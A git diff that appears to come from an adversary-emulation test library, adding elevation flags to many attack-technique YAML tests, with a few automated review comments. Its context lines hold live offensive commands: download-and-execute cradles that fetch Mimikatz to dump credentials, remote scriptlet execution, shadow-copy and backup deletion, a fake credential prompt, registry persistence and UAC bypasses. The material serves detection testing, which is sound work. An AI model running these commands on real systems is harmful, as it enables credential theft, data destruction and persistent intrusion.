@@ -29,6 +29,7 @@ atomic_tests: default: Target executor: name: command_prompt + elevation_required: false command: | cmd.exe /c "net use \\#{computer_name}\#{share_name} #{password} /u:#{user_name}" @@ -52,5 +53,6 @@ atomic_tests: default: g executor: name: powershell + elevation_required: false command: | New-PSDrive -name #{map_name} -psprovider filesystem -root \\#{computer_name}\#{share_name} diff --git a/atomics/T1081/T1081.yaml b/atomics/T1081/T1081.yaml index b96cd2dd10..39ec18d413 100644 --- a/atomics/T1081/T1081.yaml +++ b/atomics/T1081/T1081.yaml @@ -38,6 +38,7 @@ atomic_tests: - windows executor: name: powershell + elevation_required: true command: | invoke-mimikittenz mimikatz.exe @@ -49,6 +50,7 @@ atomic_tests: - windows executor: name: powershell + elevation_required: false command: | findstr /si pass *.xml | *.doc | *.txt | *.xls ls -R | select-string -Pattern password diff --git a/atomics/T1082/T1082.yaml b/atomics/T1082/T1082.yaml index f5d6a8ee54..fbe6d766ef 100644 --- a/atomics/T1082/T1082.yaml +++ b/atomics/T1082/T1082.yaml @@ -12,6 +12,7 @@ atomic_tests: executor: name: command_prompt + elevation_required: false command: | systeminfo reg query HKLM\SYSTEM\CurrentControlSet\Services\Disk\Enum diff --git a/atomics/T1083/T1083.yaml b/atomics/T1083/T1083.yaml index ed152e5f52..88b64457a3 100644 --- a/atomics/T1083/T1083.yaml +++ b/atomics/T1083/T1083.yaml @@ -12,6 +12,7 @@ atomic_tests: executor: name: command_prompt + elevation_required: false command: | dir /s c:\ >> %temp%\download dir /s "c:\Documents and Settings" >> %temp%\download @@ -31,6 +32,7 @@ atomic_tests: executor: name: powershell + elevation_required: false command: | ls -recurse get-childitem -recurse diff --git a/atomics/T1084/T1084.yaml b/atomics/T1084/T1084.yaml index 0b24f0fcbe..48ee0d3c27 100644 --- a/atomics/T1084/T1084.yaml +++ b/atomics/T1084/T1084.yaml 
@@ -20,6 +20,7 @@ atomic_tests: executor: name: powershell + elevation_required: true command: | $FilterArgs = @{name='AtomicRedTeam-WMIPersistence-Example'; diff --git a/atomics/T1085/T1085.yaml b/atomics/T1085/T1085.yaml index 7aba52cf8b..30f0b339bb 100644 --- a/atomics/T1085/T1085.yaml +++ b/atomics/T1085/T1085.yaml @@ -14,5 +14,6 @@ atomic_tests: default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1085/T1085.sct executor: name: command_prompt + elevation_required: false command: | rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:#{file_url}").Exec();" diff --git a/atomics/T1086/T1086.yaml b/atomics/T1086/T1086.yaml index 77008bcaa0..11b5379d52 100644 --- a/atomics/T1086/T1086.yaml +++ b/atomics/T1086/T1086.yaml @@ -18,6 +18,7 @@ atomic_tests: executor: name: command_prompt + elevation_required: true command: | powershell.exe "IEX (New-Object Net.WebClient).DownloadString('#{mimurl}'); Invoke-Mimikatz -DumpCreds" @@ -36,6 +37,7 @@ atomic_tests: executor: name: command_prompt + elevation_required: false command: | powershell.exe "IEX (New-Object Net.WebClient).DownloadString('#{bloodurl}'); Invoke-BloodHound" @@ -49,6 +51,7 @@ atomic_tests: executor: name: powershell + elevation_required: false command: | (New-Object Net.WebClient).DownloadFile('http://bit.ly/L3g1tCrad1e','Default_File_Path.ps1');IEX((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_}))) (New-Object Net.WebClient).DownloadFile('http://bit.ly/L3g1tCrad1e','Default_File_Path.ps1');[ScriptBlock]::Create((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_}))).InvokeReturnAsIs() 
@@ -63,6 +66,7 @@ atomic_tests: executor: name: powershell + elevation_required: true command: | $url='https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1';$wshell=New-Object -ComObject WScript.Shell;$reg='HKCU:\Software\Microsoft\Notepad';$app='Notepad';$props=(Get-ItemProperty $reg);[Void][System.Reflection.Assembly]::LoadWithPartialName('System.Windows.Forms');@(@('iWindowPosY',([String]([System.Windows.Forms.Screen]::AllScreens)).Split('}')[0].Split('=')[5]),@('StatusBar',0))|ForEach{SP $reg (Item Variable:_).Value[0] (Variable _).Value[1]};$curpid=$wshell.Exec($app).ProcessID;While(!($title=GPS|?{(Item Variable:_).Value.id-ieq$curpid}|ForEach{(Variable _).Value.MainWindowTitle})){Start-Sleep -Milliseconds 500};While(!$wshell.AppActivate($title)){Start-Sleep -Milliseconds 500};$wshell.SendKeys('^o');Start-Sleep -Milliseconds 500;@($url,(' '*1000),'~')|ForEach{$wshell.SendKeys((Variable _).Value)};$res=$Null;While($res.Length -lt 2){[Windows.Forms.Clipboard]::Clear();@('^a','^c')|ForEach{$wshell.SendKeys((Item Variable:_).Value)};Start-Sleep -Milliseconds 500;$res=([Windows.Forms.Clipboard]::GetText())};[Windows.Forms.Clipboard]::Clear();@('%f','x')|ForEach{$wshell.SendKeys((Variable _).Value)};If(GPS|?{(Item Variable:_).Value.id-ieq$curpid}){@('{TAB}','~')|ForEach{$wshell.SendKeys((Item Variable:_).Value)}};@('iWindowPosDY','iWindowPosDX','iWindowPosY','iWindowPosX','StatusBar')|ForEach{SP $reg (Item Variable:_).Value $props.((Variable _).Value)};IEX($res);invoke-mimikatz -dumpcr @@ -77,6 +81,7 @@ atomic_tests: executor: name: command_prompt + elevation_required: false command: | Powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/enigma0x3/Misc-PowerShell-Stuff/master/Invoke-AppPathBypass.ps1'); Invoke-AppPathBypass -Payload 'C:\Windows\System32\cmd.exe'" 
@@ -106,6 +111,7 @@ atomic_tests: default: Atomic Things executor: name: powershell + elevation_required: true command: | New-LocalUser -FullName '#{full_name}' -Name '#{user_name}' -Password #{password} -Description '#{description}' @@ -126,6 +132,7 @@ atomic_tests: executor: name: command_prompt + elevation_required: false command: | powershell.exe IEX -exec bypass -windowstyle hidden -noprofile "$comMsXml=New-Object -ComObject MsXml2.ServerXmlHttp;$comMsXml.Open('GET','#{url}',$False);$comMsXml.Send();IEX $comMsXml.ResponseText" @@ -146,6 +153,7 @@ atomic_tests: executor: name: command_prompt + elevation_required: false command: | powershell.exe -exec bypass -noprofile "$comMsXml=New-Object -ComObject MsXml2.ServerXmlHttp;$comMsXml.Open('GET','#{url}',$False);$comMsXml.Send();IEX $comMsXml.ResponseText" @@ -165,6 +173,7 @@ atomic_tests: executor: name: command_prompt + elevation_required: false command: | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exec bypass -windowstyle hidden -noprofile "$Xml = (New-Object System.Xml.XmlDocument);$Xml.Load('#{url}');$Xml.command.a.execute | IEX" @@ -184,6 +193,7 @@ atomic_tests: executor: name: powershell + elevation_required: false command: | "C:\Windows\system32\cmd.exe" /c "mshta.exe javascript:a=GetObject('script:#{url}').Exec();close()" @@ -210,6 +220,7 @@ atomic_tests: executor: name: command_prompt + elevation_required: false command: | reg.exe add "HKEY_CURRENT_USER\Software\Classes\AtomicRedTeam" /v ART /t REG_SZ /d "U2V0LUNvbnRlbnQgLXBhdGggJyVTeXN0ZW1Sb290JS9UZW1wL2FydC1tYXJrZXIudHh0JyAtdmFsdWUgIkhlbGxvIGZyb20gdGhlIEF0b21pYyBSZWQgVGVhbSI=" powershell.exe -noprofile -windowstyle hidden -executionpolicy bypass iex ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String((gp 'HKCU:\Software\Classes\AtomicRedTeam').ART))) diff --git a/atomics/T1087/T1087.yaml b/atomics/T1087/T1087.yaml index 574d41aa24..bd2bfa2ff0 100644 --- a/atomics/T1087/T1087.yaml +++ b/atomics/T1087/T1087.yaml 
@@ -113,6 +113,7 @@ atomic_tests: - windows executor: name: command_prompt + elevation_required: false command: | net user net user /domain @@ -128,6 +129,7 @@ atomic_tests: - windows executor: name: powershell + elevation_required: false command: | net user net user /domain @@ -148,6 +150,7 @@ atomic_tests: - windows executor: name: command_prompt + elevation_required: false command: | query user @@ -158,5 +161,6 @@ atomic_tests: - windows executor: name: powershell + elevation_required: false command: | query user diff --git a/atomics/T1088/T1088.yaml b/atomics/T1088/T1088.yaml index 96f30d8c74..4e8b420b0a 100644 --- a/atomics/T1088/T1088.yaml +++ b/atomics/T1088/T1088.yaml @@ -57,6 +57,7 @@ atomic_tests: executor: name: command_prompt + elevation_required: false command: | reg.exe add hkcu\software\classes\ms-settings\shell\open\command /ve /d "#{executable_binary}" /f reg.exe add hkcu\software\classes\ms-settings\shell\open\command /v "DelegateExecute" @@ -77,6 +78,7 @@ atomic_tests: executor: name: powershell + elevation_required: false command: | New-Item "HKCU:\software\classes\ms-settings\shell\open\command" -Force New-ItemProperty "HKCU:\software\classes\ms-settings\shell\open\command" -Name "DelegateExecute" -Value "" -Force diff --git a/atomics/T1096/T1096.yaml b/atomics/T1096/T1096.yaml index bc89bf3bbf..7dc47c52d2 100644 --- a/atomics/T1096/T1096.yaml +++ b/atomics/T1096/T1096.yaml @@ -22,6 +22,7 @@ atomic_tests: executor: name: command_prompt + elevation_required: true command: | type C:\temp\evil.exe > "C:\Program Files (x86)\TeamViewer\TeamViewer12_Logfile.log:evil.exe" extrac32 #{path}\procexp.cab #{path}\file.txt:procexp.exe diff --git a/atomics/T1098/T1098.yaml b/atomics/T1098/T1098.yaml index 0588686514..cb0548e7ce 100644 --- a/atomics/T1098/T1098.yaml +++ b/atomics/T1098/T1098.yaml 
@@ -10,6 +10,7 @@ atomic_tests: - windows executor: name: powershell + elevation_required: true command: | $x = Get-Random -Minimum 2 -Maximum 9999 $y = Get-Random -Minimum 2 -Maximum 9999 diff --git a/atomics/T1099/T1099.yaml b/atomics/T1099/T1099.yaml index 83331f0947..0f5b6aa7d7 100644 --- a/atomics/T1099/T1099.yaml +++ b/atomics/T1099/T1099.yaml @@ -101,6 +101,7 @@ atomic_tests: default: '1970-01-01 00:00:00' executor: name: command_prompt + elevation_required: false command: | powershell.exe Get-ChildItem #{file_path} | % { $_.CreationTime = #{target_date_time} } @@ -123,6 +124,7 @@ atomic_tests: default: '1970-01-01 00:00:00' executor: name: command_prompt + elevation_required: false command: | powershell.exe Get-ChildItem #{file_path} | % { $_.LastWriteTime = #{target_date_time} } @@ -145,5 +147,6 @@ atomic_tests: default: '1970-01-01 00:00:00' executor: name: command_prompt + elevation_required: false command: | powershell.exe Get-ChildItem #{file_path} | % { $_.LastAccessTime = #{target_date_time} } diff --git a/atomics/T1101/T1101.yaml b/atomics/T1101/T1101.yaml index 24f3ce86cd..e9233f5a8b 100644 --- a/atomics/T1101/T1101.yaml +++ b/atomics/T1101/T1101.yaml @@ -15,6 +15,7 @@ atomic_tests: executor: name: powershell + elevation_required: true command: | # run these in sequence $SecurityPackages = Get-ItemProperty HKLM:\System\CurrentControlSet\Control\Lsa -Name 'Security Packages' | Select-Object -ExpandProperty 'Security Packages' diff --git a/atomics/T1103/T1103.yaml b/atomics/T1103/T1103.yaml index 72f636e79c..418436ef73 100644 --- a/atomics/T1103/T1103.yaml +++ b/atomics/T1103/T1103.yaml @@ -17,5 +17,6 @@ atomic_tests: executor: name: command_prompt + elevation_required: true command: | reg.exe import #{registry_file} diff --git a/atomics/T1105/T1105.yaml b/atomics/T1105/T1105.yaml index 309d30e6a8..9ca33407c8 100644 --- a/atomics/T1105/T1105.yaml +++ b/atomics/T1105/T1105.yaml 
@@ -186,6 +186,7 @@ atomic_tests: default: Atomic-license.txt executor: name: command_prompt + elevation_required: false command: | cmd /c certutil -urlcache -split -f #{remote_file} #{local_path} - name: certutil download (verifyctl) @@ -204,6 +205,7 @@ atomic_tests: default: Atomic-license.txt executor: name: powershell + elevation_required: false command: | $datePath = "certutil-$(Get-Date -format yyyy_MM_dd_HH_mm)" New-Item -Path $datePath -ItemType Directory diff --git a/atomics/T1107/T1107.yaml b/atomics/T1107/T1107.yaml index d0ce165ca0..f2cd48c7c9 100644 --- a/atomics/T1107/T1107.yaml +++ b/atomics/T1107/T1107.yaml @@ -62,6 +62,7 @@ atomic_tests: default: C:\Windows\Temp\victim-files-cmd\a executor: name: command_prompt + elevation_required: false command: | del /f #{file_to_delete} @@ -77,6 +78,7 @@ atomic_tests: default: C:\Windows\Temp\victim-files-cmd executor: name: command_prompt + elevation_required: false command: | del /f /S #{folder_to_delete} @@ -92,6 +94,7 @@ atomic_tests: default: C:\Windows\Temp\victim-files-ps\a executor: name: powershell + elevation_required: false command: | Remove-Item -path "#{file_to_delete}" @@ -107,6 +110,7 @@ atomic_tests: default: C:\Windows\Temp\victim-files-ps executor: name: powershell + elevation_required: false command: | Remove-Item -path "#{folder_to_delete}" -recurse @@ -117,6 +121,7 @@ atomic_tests: - windows executor: name: command_prompt + elevation_required: true command: | vssadmin.exe Delete Shadows /All /Quiet @@ -127,6 +132,7 @@ atomic_tests: - windows executor: name: command_prompt + elevation_required: true command: | wmic shadowcopy delete @@ -148,6 +154,7 @@ atomic_tests: - windows executor: name: command_prompt + elevation_required: true command: | wbadmin delete catalog -quiet diff --git a/atomics/T1110/T1110.yaml b/atomics/T1110/T1110.yaml index 79fb788c33..3ebd3a87ae 100644 --- a/atomics/T1110/T1110.yaml +++ b/atomics/T1110/T1110.yaml 
@@ -27,6 +27,7 @@ atomic_tests: default: YOUR_COMPANY executor: name: command_prompt + elevation_required: false command: | net user /domain > #{input_file_users} echo "Password1" >> #{input_file_passwords} diff --git a/atomics/T1112/T1112.yaml b/atomics/T1112/T1112.yaml index 6093068275..a96b019fc7 100644 --- a/atomics/T1112/T1112.yaml +++ b/atomics/T1112/T1112.yaml @@ -10,6 +10,7 @@ atomic_tests: - windows executor: name: command_prompt + elevation_required: false command: | reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /t REG_DWORD /v HideFileExt /d 1 /f @@ -21,6 +22,7 @@ atomic_tests: - windows executor: name: command_prompt + elevation_required: true command: | reg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /t REG_EXPAND_SZ /v SecurityHealth /d {some_other_executable} /f @@ -31,6 +33,7 @@ atomic_tests: - windows executor: name: powershell + elevation_required: true command: | # here is an example of using the same method of reg load, but without the New-PSDrive cmdlet. # Here we can load all unloaded user hives and do whatever we want in the location below (comments) diff --git a/atomics/T1113/T1113.yaml b/atomics/T1113/T1113.yaml index 6f3c0007a9..604cc6e23d 100644 --- a/atomics/T1113/T1113.yaml +++ b/atomics/T1113/T1113.yaml @@ -16,6 +16,7 @@ atomic_tests: default: desktop.png executor: name: bash + elevation_required: false command: screencapture #{output_file} - name: Screencapture (silent) @@ -31,6 +32,7 @@ atomic_tests: default: desktop.png executor: name: bash + elevation_required: false command: screencapture -x #{output_file} - name: X Windows Capture diff --git a/atomics/T1114/T1114.yaml b/atomics/T1114/T1114.yaml index 01d0e4c10a..c75513695e 100644 --- a/atomics/T1114/T1114.yaml +++ b/atomics/T1114/T1114.yaml @@ -14,6 +14,7 @@ atomic_tests: executor: name: command_prompt + elevation_required: false command: | Display email contents in the terminal PS C:\> .\Get-Inbox.ps1 
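Review bot: In the T1114 hunk, `elevation_required: false` is attached to a `command: |` block whose content is descriptive text (`Display email contents in the terminal`, then a `PS C:\>` prompt line) rather than a runnable command, so an executor would fail on the first word regardless of elevation. The new attribute only carries meaning once the block holds the actual invocation; presumably that is a `powershell` executor with `.\Get-Inbox.ps1` as the body, with the explanatory sentence moved to the test's `description`. The rest of that test is outside the hunk.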
diff --git a/atomics/T1115/T1115.yaml b/atomics/T1115/T1115.yaml index 9173870300..17b7f71a18 100644 --- a/atomics/T1115/T1115.yaml +++ b/atomics/T1115/T1115.yaml @@ -11,6 +11,7 @@ atomic_tests: - windows executor: name: command_prompt + elevation_required: false command: | dir | clip clip < readme.txt @@ -22,6 +23,7 @@ atomic_tests: - windows executor: name: powershell + elevation_required: false command: | echo Get-Process | clip Get-Clipboard | iex diff --git a/atomics/T1117/T1117.yaml b/atomics/T1117/T1117.yaml index 923f4ad522..7e871a7ea8 100644 --- a/atomics/T1117/T1117.yaml +++ b/atomics/T1117/T1117.yaml @@ -14,6 +14,7 @@ atomic_tests: default: C:\AtomicRedTeam\atomics\T1117\RegSvr32.sct executor: name: command_prompt + elevation_required: false command: | regsvr32.exe /s /u /i:#(unknown) scrobj.dll - name: Regsvr32 remote COM scriptlet execution @@ -28,6 +29,7 @@ atomic_tests: default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct executor: name: command_prompt + elevation_required: false command: | regsvr32.exe /s /u /i:#{url} scrobj.dll - name: Regsvr32 local DLL execution @@ -42,5 +44,6 @@ atomic_tests: default: C:\AtomicRedTeam\atomics\T1117\bin\AllTheThingsx86.dll executor: name: command_prompt + elevation_required: false command: | "IF "%PROCESSOR_ARCHITECTURE%"=="AMD64" (C:\Windows\syswow64\regsvr32.exe /s #{dll_name}) ELSE ( regsvr32.exe /s #{dll_name} )" diff --git a/atomics/T1118/T1118.yaml b/atomics/T1118/T1118.yaml index fdcafb0510..02feb78bac 100644 --- a/atomics/T1118/T1118.yaml +++ b/atomics/T1118/T1118.yaml 
@@ -15,6 +15,7 @@ atomic_tests: default: C:\AtomicRedTeam\atomics\T1118\src\T1118.dll executor: name: command_prompt + elevation_required: false command: | C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /target:library /out:C:\AtomicRedTeam\atomics\T1118\src\T1118.dll C:\AtomicRedTeam\atomics\T1118\src\T1118.cs C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U #(unknown) @@ -30,6 +31,7 @@ atomic_tests: default: C:\AtomicRedTeam\atomics\T1118\src\T1118.dll executor: name: command_prompt + elevation_required: false command: | C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /target:library /out:C:\AtomicRedTeam\atomics\T1118\src\T1118.dll C:\AtomicRedTeam\atomics\T1118\src\T1118.cs C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /? #(unknown) diff --git a/atomics/T1119/T1119.yaml b/atomics/T1119/T1119.yaml index e084d6045b..6f00709432 100644 --- a/atomics/T1119/T1119.yaml +++ b/atomics/T1119/T1119.yaml @@ -23,5 +23,6 @@ atomic_tests: - windows executor: name: powershell + elevation_required: false command: | Get-ChildItem -Recurse -Include *.doc | % {Copy-Item $_.FullName -destination c:\temp} diff --git a/atomics/T1121/T1121.yaml b/atomics/T1121/T1121.yaml index 5a0d9c803d..ae5e734817 100644 --- a/atomics/T1121/T1121.yaml +++ b/atomics/T1121/T1121.yaml @@ -19,6 +19,7 @@ atomic_tests: default: C:\AtomicRedTeam\atomics\T1121\src\T1121.cs executor: name: command_prompt + elevation_required: false command: | C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /target:library #{source_file} C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U #{file_name} @@ -40,6 +41,7 @@ atomic_tests: default: C:\AtomicRedTeam\atomics\T1121\src\T1121.cs executor: name: powershell + elevation_required: false command: | $key = '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' $Content = [System.Convert]::FromBase64String($key) 
diff --git a/atomics/T1123/T1123.yaml b/atomics/T1123/T1123.yaml index d90a15aecf..b9c753fb12 100644 --- a/atomics/T1123/T1123.yaml +++ b/atomics/T1123/T1123.yaml @@ -23,6 +23,7 @@ atomic_tests: executor: name: command_prompt + elevation_required: false command: | SoundRecorder /FILE #{output_file} /DURATION #{duration_hms} @@ -33,5 +34,6 @@ atomic_tests: - windows executor: name: command_prompt + elevation_required: false command: | powershell.exe -Command WindowsAudioDevice-Powershell-Cmdlet diff --git a/atomics/T1124/T1124.yaml b/atomics/T1124/T1124.yaml index e7d76c8666..6934b67dd8 100644 --- a/atomics/T1124/T1124.yaml +++ b/atomics/T1124/T1124.yaml @@ -18,6 +18,7 @@ atomic_tests: executor: name: command_prompt + elevation_required: false command: | net time \\#{computer_name} w32tm /tz @@ -31,5 +32,6 @@ atomic_tests: executor: name: powershell + elevation_required: false command: | Get-Date diff --git a/atomics/T1126/T1126.yaml b/atomics/T1126/T1126.yaml index fc10ef5b70..0ee14923d3 100644 --- a/atomics/T1126/T1126.yaml +++ b/atomics/T1126/T1126.yaml @@ -18,6 +18,7 @@ atomic_tests: executor: name: command_prompt + elevation_required: false command: | net use c: #{share_name} net share test=#{share_name} /REMARK:"test share" /CACHE:No @@ -37,6 +38,7 @@ atomic_tests: executor: name: command_prompt + elevation_required: false command: | net share #{share_name} /delete @@ -55,6 +57,7 @@ atomic_tests: executor: name: powershell + elevation_required: false command: | Remove-SmbShare -Name #{share_name} Remove-FileShare -Name #{share_name} diff --git a/atomics/T1127/T1127.yaml b/atomics/T1127/T1127.yaml index 30e3f9b386..fdb111c01c 100644 --- a/atomics/T1127/T1127.yaml +++ b/atomics/T1127/T1127.yaml @@ -14,5 +14,6 @@ atomic_tests: default: T1127.csproj executor: name: command_prompt + elevation_required: false command: | C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe #(unknown) 
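Review bot: `elevation_required: false` on the first T1126 hunk looks wrong: creating a share with `net share test=#{share_name} /REMARK:"test share" /CACHE:No` needs an administrative prompt on stock Windows, so an unelevated run fails with access denied instead of exercising the technique. The same applies to the second hunk (`net share #{share_name} /delete`) and, as far as I recall, to `Remove-SmbShare` / `Remove-FileShare` in the third; I would set `elevation_required: true` on all three. If only the `net use c: #{share_name}` step is meant to run unelevated, it may belong in a separate test.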
diff --git a/atomics/T1134/T1134.yaml b/atomics/T1134/T1134.yaml index cccd358e3e..9613ea2a6b 100644 --- a/atomics/T1134/T1134.yaml +++ b/atomics/T1134/T1134.yaml @@ -16,6 +16,7 @@ atomic_tests: default: SYSTEM executor: name: powershell + elevation_required: true command: | #list processes by user, diff --git a/atomics/T1135/T1135.yaml b/atomics/T1135/T1135.yaml index 3e056ec98a..a91cb1c7b5 100644 --- a/atomics/T1135/T1135.yaml +++ b/atomics/T1135/T1135.yaml @@ -36,6 +36,7 @@ atomic_tests: default: computer1 executor: name: command_prompt + elevation_required: false command: | net view \\#{computer_name} @@ -51,6 +52,7 @@ atomic_tests: default: computer1 executor: name: powershell + elevation_required: false command: | net view \\#{computer_name} get-smbshare -Name #{computer_name} diff --git a/atomics/T1136/T1136.yaml b/atomics/T1136/T1136.yaml index b6698c0bb3..8eb7fb887d 100644 --- a/atomics/T1136/T1136.yaml +++ b/atomics/T1136/T1136.yaml @@ -58,6 +58,7 @@ atomic_tests: default: Evil Account executor: name: command_prompt + elevation_required: true command: | net user /add #{username} @@ -73,6 +74,7 @@ atomic_tests: default: Evil Account executor: name: powershell + elevation_required: true command: | New-LocalUser -Name #{username} -NoPassword net user /add #{username} diff --git a/atomics/T1138/T1138.yaml b/atomics/T1138/T1138.yaml index bc343b88a7..fc4de328ca 100644 --- a/atomics/T1138/T1138.yaml +++ b/atomics/T1138/T1138.yaml @@ -20,6 +20,7 @@ atomic_tests: default: C:\AtomicRedTeam\atomics\T1138\src\AtomicShimx86.sdb executor: name: command_prompt + elevation_required: true command: | sdbinst.exe #{file_path} sdbinst.exe -u #{file_path} diff --git a/atomics/T1140/T1140.yaml b/atomics/T1140/T1140.yaml index f3e68a7eee..d1680edb61 100644 --- a/atomics/T1140/T1140.yaml +++ b/atomics/T1140/T1140.yaml 
@@ -18,6 +18,7 @@ atomic_tests: executor: name: command_prompt + elevation_required: false command: | certutil.exe -encode #{executable} file.txt certutil.exe -decode file.txt #{executable} @@ -37,6 +38,7 @@ atomic_tests: executor: name: command_prompt + elevation_required: false command: | cmd.exe /c copy %windir%\\system32\\certutil.exe %temp%tcm.tmp cmd.exe /c %temp%tcm.tmp -decode #{executable} file.txt diff --git a/atomics/T1141/T1141.yaml b/atomics/T1141/T1141.yaml index 2d3f6fc54b..4c4eafb38d 100644 --- a/atomics/T1141/T1141.yaml +++ b/atomics/T1141/T1141.yaml @@ -28,5 +28,6 @@ atomic_tests: executor: name: command_prompt + elevation_required: false command: | powershell.exe -command {$cred = $host.UI.PromptForCredential('Windows Security Update', '',[Environment]::UserName, [Environment]::UserDomainName); echo $cred.GetNetworkCredential().Password;} \ No newline at end of file diff --git a/atomics/T1145/T1145.yaml b/atomics/T1145/T1145.yaml index be8eb158b4..9981fd1ae2 100644 --- a/atomics/T1145/T1145.yaml +++ b/atomics/T1145/T1145.yaml @@ -14,6 +14,7 @@ atomic_tests: executor: name: command_prompt + elevation_required: true command: | echo "ATOMICREDTEAM" > %windir%\cert.key dir c:\ /b /s .key | findstr /e .key diff --git a/atomics/T1158/T1158.yaml b/atomics/T1158/T1158.yaml index edd9c4df2a..2e5ce8a658 100644 --- a/atomics/T1158/T1158.yaml +++ b/atomics/T1158/T1158.yaml @@ -60,9 +60,10 @@ atomic_tests: filename: description: path of file to mark as system type: path - default: C:\Windows\Temp\sensitive_file.txt + default: C:\Temp\sensitive_file.txt executor: name: command_prompt + elevation_required: false command: | attrib.exe +s #(unknown) @@ -77,9 +78,10 @@ atomic_tests: filename: description: path of file to mark as hidden type: path - default: C:\Windows\Temp\sensitive_file.txt + default: C:\Temp\sensitive_file.txt executor: name: command_prompt + elevation_required: false command: | attrib.exe +h #(unknown) 
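Review bot: T1141 still ends without a trailing newline (`\ No newline at end of file` on the hunk's last context line). Since this commit already edits that executor block, adding the final newline here keeps yamllint's `new-line-at-end-of-file` check quiet and avoids a noisy one-line diff later.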
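Review bot: The `default:` change from `C:\Windows\Temp\sensitive_file.txt` to `C:\Temp\sensitive_file.txt` in the two T1158 hunks is not mentioned in the commit message (`Add elevated`); the description should state why it was made, presumably so the test can honestly carry `elevation_required: false`. `C:\Temp` is not a directory that exists on a stock Windows install, so `attrib.exe +s` / `attrib.exe +h` will report the file as not found unless something creates it first; a prerequisite step, or a location that always exists such as `%TEMP%`, would make the tests self-contained.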
@@ -175,6 +177,7 @@ atomic_tests: default: adstest.txt executor: name: command_prompt + elevation_required: false command: | echo "test" > #{file_name}:#{ads_filename} echo "test" > :#{ads_filename} @@ -196,6 +199,7 @@ atomic_tests: default: adstest.txt executor: name: powershell + elevation_required: false command: | echo "test" > #{file_name} | set-content -path test.txt -stream #{ads_filename} -value "test" set-content -path #{file_name} -stream #{ads_filename} -value "test2" diff --git a/atomics/T1170/T1170.yaml b/atomics/T1170/T1170.yaml index 1614bebd65..e88984fb57 100644 --- a/atomics/T1170/T1170.yaml +++ b/atomics/T1170/T1170.yaml @@ -15,6 +15,7 @@ atomic_tests: default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1170/mshta.sct executor: name: command_prompt + elevation_required: false command: | mshta.exe javascript:a=(GetObject('script:#{file_url}')).Exec();close(); diff --git a/atomics/T1174/T1174.yaml b/atomics/T1174/T1174.yaml index 7cb7109878..ac00cd7feb 100644 --- a/atomics/T1174/T1174.yaml +++ b/atomics/T1174/T1174.yaml @@ -18,6 +18,7 @@ atomic_tests: executor: name: powershell + elevation_required: true command: | $passwordFilterName = (Copy-Item "#{input_dll}" -Destination "C:\Windows\System32" -PassThru).basename $lsaKey = Get-Item "HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\" diff --git a/atomics/T1179/T1179.yaml b/atomics/T1179/T1179.yaml index b993f37d34..888649e4f7 100644 --- a/atomics/T1179/T1179.yaml +++ b/atomics/T1179/T1179.yaml @@ -19,6 +19,7 @@ atomic_tests: default: https://www.example.com executor: name: powershell + elevation_required: true command: | mavinject $pid /INJECTRUNNING #{file_name} curl #{server_name} diff --git a/atomics/T1180/T1180.yaml b/atomics/T1180/T1180.yaml index fb75d2d18a..395599b7b0 100644 --- a/atomics/T1180/T1180.yaml +++ b/atomics/T1180/T1180.yaml 
@@ -18,6 +18,7 @@ atomic_tests: executor: name: command_prompt + elevation_required: true command: | copy #{input_binary} "%SystemRoot%\System32\evilscreensaver.scr" reg.exe add "HKEY_CURRENT_USER\Control Panel\Desktop" /v ScreenSaveActive /t REG_SZ /d 1 /f diff --git a/atomics/T1183/T1183.yaml b/atomics/T1183/T1183.yaml index ca87b94f0d..abc25a505f 100644 --- a/atomics/T1183/T1183.yaml +++ b/atomics/T1183/T1183.yaml @@ -21,6 +21,7 @@ atomic_tests: executor: name: command_prompt + elevation_required: true command: | REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\#{target_binary}" /v Debugger /d "#{payload_binary}" @@ -43,5 +44,6 @@ atomic_tests: executor: name: command_prompt + elevation_required: true command: | REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\#{target_binary}" /v GlobalFlag /t REG_DWORD /d 512 REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\#{target_binary}" /v ReportingMode /t REG_DWORD /d 1 REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\#{target_binary}" /v MonitorProcess /d "#{payload_binary}" diff --git a/atomics/T1191/T1191.yaml b/atomics/T1191/T1191.yaml index 7ee70bf51b..a3505c1576 100644 --- a/atomics/T1191/T1191.yaml +++ b/atomics/T1191/T1191.yaml @@ -17,6 +17,7 @@ atomic_tests: executor: name: command_prompt + elevation_required: false command: | cmstp.exe /s #{inf_file_path} @@ -35,5 +36,6 @@ atomic_tests: executor: name: command_prompt + elevation_required: false command: | cmstp.exe /s #{inf_file_uac} /au diff --git a/atomics/T1193/T1193.yaml b/atomics/T1193/T1193.yaml index 666c6cb712..dec1e631ea 100644 --- a/atomics/T1193/T1193.yaml +++ b/atomics/T1193/T1193.yaml @@ -11,6 +11,7 @@ atomic_tests: - windows executor: name: powershell + elevation_required: false command: | if (-not(Test-Path 